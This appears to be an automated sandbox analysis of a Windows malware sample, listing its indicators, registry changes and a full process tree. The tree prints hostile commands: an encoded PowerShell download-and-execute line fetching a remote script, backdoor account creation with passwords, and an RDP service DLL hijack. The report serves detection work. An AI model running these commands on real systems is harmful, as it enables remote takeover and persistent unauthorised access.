Analysis
  max time kernel:  58s
  max time network: 100s
  platform:         windows10_x64
  resource:         win10v20210408
  submitted:        11-06-2021 14:59

  Static task: static1
  Behavioral task: behavioral1
    Sample:   20f307c716a689f4afa3a76b7143db22.exe
    Resource: win7v20210408
  Behavioral task: behavioral2
    Sample:   20f307c716a689f4afa3a76b7143db22.exe
    Resource: win10v20210408
General
  Target: 20f307c716a689f4afa3a76b7143db22.exe
  Size:   6.0MB
  MD5:    20f307c716a689f4afa3a76b7143db22
  SHA1:   2fd6796fd158c93b14654240533511af6fec03e5
  SHA256: 3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
  SHA512: 0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
  Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
  Processes:
    flow  pid  process
    15    212  powershell.exe
    17    212  powershell.exe
    18    212  powershell.exe
    19    212  powershell.exe
    21    212  powershell.exe
    23    212  powershell.exe
    25    212  powershell.exe
    27    212  powershell.exe
    29    212  powershell.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)
  Processes:
    resource                        yara_rule
    \Windows\Branding\mediasrv.png  upx
    \Windows\Branding\mediasvc.png  upx
Loads dropped DLL (2 IoCs)
  Processes:
    pid   process
    4012  -
    4012  -

Drops file in Program Files directory (4 IoCs)
  Processes (description: ioc [process]):
    File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  [powershell.exe]
    File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  [powershell.exe]
    File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  [powershell.exe]
    File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  [powershell.exe]
Drops file in Windows directory (19 IoCs)
  Processes (description: ioc [process]):
    File created: C:\Windows\branding\wupsvc.jpg  [powershell.exe]
    File opened for modification: C:\Windows\branding\ShellBrd  [powershell.exe]
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wgyjbpvf.l0f.ps1  [powershell.exe]
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID317.tmp  [powershell.exe]
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID328.tmp  [powershell.exe]
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  [powershell.exe]
    File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  [powershell.exe]
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID269.tmp  [powershell.exe]
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID2F6.tmp  [powershell.exe]
    File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID327.tmp  [powershell.exe]
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  [powershell.exe]
    File created: C:\Windows\branding\mediasrv.png  [powershell.exe]
    File opened for modification: C:\Windows\branding\wupsvc.jpg  [powershell.exe]
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jag502fc.aqf.psm1  [powershell.exe]
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  [powershell.exe]
    File created: C:\Windows\branding\mediasvc.png  [powershell.exe]
    File opened for modification: C:\Windows\branding\Basebrd  [powershell.exe]
    File opened for modification: C:\Windows\branding\mediasrv.png  [powershell.exe]
    File opened for modification: C:\Windows\branding\mediasvc.png  [powershell.exe]
Modifies data under HKEY_USERS (64 IoCs)
  Processes (description: ioc [process]):
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  [WMIC.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"  [powershell.exe]
    Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo  [powershell.exe]
    Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  [WMIC.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"  [powershell.exe]
    Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"  [powershell.exe]
    Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  [powershell.exe]
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
    description             flow  ioc
    HTTP User-Agent header  17    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  18    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  19    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes:
    pid   process         events
    3028  powershell.exe  3
    1588  powershell.exe  3
    1264  powershell.exe  3
    2160  powershell.exe  3
    3028  powershell.exe  3
    212   powershell.exe  3

Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
    pid  process
    636  -
    636  -
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token privileges enabled, grouped by pid; all powershell.exe):
    3028  SeDebugPrivilege
    1588  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    1264  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    2160  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (pid process -> target pid target process; each pair was recorded twice):
    668   20f307c716a689f4afa3a76b7143db22.exe -> 3028  powershell.exe
    3028  powershell.exe -> 3744  csc.exe
    3744  csc.exe        -> 2392  cvtres.exe
    3028  powershell.exe -> 1588  powershell.exe
    3028  powershell.exe -> 1264  powershell.exe
    3028  powershell.exe -> 2160  powershell.exe
    3028  powershell.exe -> 3724  reg.exe
    3028  powershell.exe -> 1728  reg.exe
    3028  powershell.exe -> 2364  reg.exe
    3028  powershell.exe -> 2228  net.exe
    2228  net.exe        -> 2236  net1.exe
    3028  powershell.exe -> 3892  cmd.exe
    3892  cmd.exe        -> 512   cmd.exe
    512   cmd.exe        -> 4020  net.exe
    4020  net.exe        -> 2360  net1.exe
    3028  powershell.exe -> 2016  cmd.exe
    2016  cmd.exe        -> 2144  cmd.exe
    2144  cmd.exe        -> 1276  net.exe
    1276  net.exe        -> 2232  net1.exe
    3744  cmd.exe        -> 3576  net.exe
    3576  net.exe        -> 1588  net1.exe
    560   cmd.exe        -> 2088  net.exe
    2088  net.exe        -> 2500  net1.exe
    2792  cmd.exe        -> 3120  net.exe
    3120  net.exe        -> 188   net1.exe
    2768  cmd.exe        -> 4056  net.exe
    4056  net.exe        -> 3964  net1.exe
    2308  cmd.exe        -> 1588  net.exe
    1588  net.exe        -> 656   net1.exe
    760   cmd.exe        -> 2504  net.exe
    2504  net.exe        -> 1608  net1.exe
    1232  cmd.exe        -> 2160  WMIC.exe
Processes (process tree; indentation and [depth n] give the nesting level)

[depth 1] C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline"
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp" "c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP"
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [depth 3] C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    [depth 3] C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [depth 3] C:\Windows\system32\net.exe
      cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [depth 3] C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\system32\cmd.exe
        cmd: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\system32\net.exe
          cmd: net start rdpdr
          - Suspicious use of WriteProcessMemory
          [depth 6] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 start rdpdr
    [depth 3] C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\system32\cmd.exe
        cmd: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\system32\net.exe
          cmd: net start TermService
          - Suspicious use of WriteProcessMemory
          [depth 6] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 start TermService
    [depth 3] C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [depth 3] C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user wgautilacc Ghar4f5 /del
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user wgautilacc 9gM25Ibj /add
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe user wgautilacc 9gM25Ibj /add
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user wgautilacc 9gM25Ibj /add

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user wgautilacc 9gM25Ibj
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\net.exe
    cmd: net.exe user wgautilacc 9gM25Ibj
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user wgautilacc 9gM25Ibj

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\System32\Wbem\WMIC.exe
    cmd: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic CPU get NAME
  [depth 2] C:\Windows\System32\Wbem\WMIC.exe
    cmd: wmic CPU get NAME
    - Modifies data under HKEY_USERS

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [depth 2] C:\Windows\system32\cmd.exe
    cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C net user wgautilacc 1234
  [depth 2] C:\Windows\system32\net.exe
    cmd: net user wgautilacc 1234
    [depth 3] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user wgautilacc 1234
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
memory/188-230-0x0000000000000000-mapping.dmp
-
memory/212-242-0x00000269E5263000-0x00000269E5265000-memory.dmp
Filesize 8KB
-
memory/212-243-0x00000269E5266000-0x00000269E5268000-memory.dmp
Filesize 8KB
-
memory/212-240-0x0000000000000000-mapping.dmp
-
memory/212-241-0x00000269E5260000-0x00000269E5262000-memory.dmp
Filesize 8KB
-
memory/212-244-0x00000269E5268000-0x00000269E5269000-memory.dmp
Filesize 4KB
-
memory/512-216-0x0000000000000000-mapping.dmp
-
memory/656-234-0x0000000000000000-mapping.dmp
-
memory/668-117-0x0000023EFDDE3000-0x0000023EFDDE5000-memory.dmp
Filesize 8KB
-
memory/668-114-0x0000023EFDDE0000-0x0000023EFDDE2000-memory.dmp
Filesize 8KB
-
memory/668-119-0x0000023EFDDE6000-0x0000023EFDDE7000-memory.dmp
Filesize 4KB
-
memory/668-115-0x0000023EFE220000-0x0000023EFE641000-memory.dmp
Filesize 4.1MB
-
memory/668-118-0x0000023EFDDE5000-0x0000023EFDDE6000-memory.dmp
Filesize 4KB
-
memory/1264-200-0x0000000000000000-mapping.dmp
-
memory/1264-205-0x0000028375626000-0x0000028375628000-memory.dmp
Filesize 8KB
-
